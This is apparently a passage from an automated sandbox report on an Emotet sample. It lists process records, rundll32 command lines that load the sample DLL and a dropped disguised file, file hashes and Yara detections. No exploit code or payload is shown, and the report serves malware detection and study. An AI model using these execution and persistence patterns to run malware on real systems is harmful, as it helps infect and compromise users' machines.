                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.939332319.00000000005C0000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.939332319.00000000005C0000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.939371192.000000000095A000.00000004.00000020.sdmp, Author: Joe Security
                          Reputation:high

                          Analysis Process: rundll32.exe PID: 5624 Parent PID: 6932

                          General

                          Start time:00:54:02
                          Start date:02/12/2021
                          Path:C:\Windows\SysWOW64\rundll32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",Control_RunDLL
                          Imagebase:0x11d0000
                          File size:61952 bytes
                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Analysis Process: rundll32.exe PID: 6496 Parent PID: 6920

                          General

                          Start time:00:54:03
                          Start date:02/12/2021
                          Path:C:\Windows\SysWOW64\rundll32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cwisdx\vimpwfmepmyc.nyd",czAZWAgsaZPj
                          Imagebase:0x11d0000
                          File size:61952 bytes
                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.1030937060.0000000000DBA000.00000004.00000020.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.1031053353.00000000010B0000.00000040.00000001.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.1031053353.00000000010B0000.00000040.00000001.sdmp, Author: Joe Security
                          Reputation:high

                          Analysis Process: rundll32.exe PID: 5228 Parent PID: 6988

                          General

                          Start time:00:54:09
                          Start date:02/12/2021
                          Path:C:\Windows\SysWOW64\rundll32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",Control_RunDLL
                          Imagebase:0x11d0000
                          File size:61952 bytes
                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Analysis Process: rundll32.exe PID: 6572 Parent PID: 7000

                          General

                          Start time:00:54:14
                          Start date:02/12/2021
                          Path:C:\Windows\SysWOW64\rundll32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",Control_RunDLL
                          Imagebase:0x11d0000
                          File size:61952 bytes
                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Analysis Process: svchost.exe PID: 5996 Parent PID: 568

                          General

                          Start time:00:54:14
                          Start date:02/12/2021
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                          Imagebase:0x7ff6eb840000
                          File size:51288 bytes
                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Analysis Process: WerFault.exe PID: 6596 Parent PID: 5996

                          General

                          Start time:00:54:15
                          Start date:02/12/2021
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6888 -ip 6888
                          Imagebase:0xf50000
                          File size:434592 bytes
                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Analysis Process: WerFault.exe PID: 7052 Parent PID: 6888

                          General

                          Start time:00:54:18
                          Start date:02/12/2021
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6888 -s 308
                          Imagebase:0xf50000
                          File size:434592 bytes
                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Analysis Process: WerFault.exe PID: 6948 Parent PID: 5996

                          General

                          Start time:00:54:25
                          Start date:02/12/2021
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6888 -ip 6888
                          Imagebase:0xf50000
                          File size:434592 bytes
                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Analysis Process: WerFault.exe PID: 3144 Parent PID: 6888

                          General

                          Start time:00:54:27
                          Start date:02/12/2021
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6888 -s 304
                          Imagebase:0xf50000
                          File size:434592 bytes
                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Analysis Process: svchost.exe PID: 5528 Parent PID: 568

                          General

                          Start time:00:54:46
                          Start date:02/12/2021
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                          Imagebase:0x7ff6eb840000
                          File size:51288 bytes
                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Analysis Process: rundll32.exe PID: 6128 Parent PID: 6496

                          General

                          Start time:00:54:59
                          Start date:02/12/2021
                          Path:C:\Windows\SysWOW64\rundll32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Cwisdx\vimpwfmepmyc.nyd",Control_RunDLL
                          Imagebase:0x11d0000
                          File size:61952 bytes
                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000017.00000003.1139622922.0000000000FAB000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000017.00000003.1139622922.0000000000FAB000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000017.00000002.1183917294.0000000000EB0000.00000040.00000010.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000017.00000002.1183917294.0000000000EB0000.00000040.00000010.sdmp, Author: Joe Security

                          Analysis Process: svchost.exe PID: 6240 Parent PID: 568

                          General

                          Start time:00:55:16
                          Start date:02/12/2021
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                          Imagebase:0x7ff6eb840000
                          File size:51288 bytes
                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Analysis Process: svchost.exe PID: 5644 Parent PID: 568

                          General

                          Start time:00:55:39
                          Start date:02/12/2021
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                          Imagebase:0x7ff6eb840000
                          File size:51288 bytes
                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Analysis Process: svchost.exe PID: 4588 Parent PID: 568

                          General

                          Start time:00:55:54
                          Start date:02/12/2021
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                          Imagebase:0x7ff6eb840000
                          File size:51288 bytes
                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Disassembly

                          Code Analysis

                          Reset < >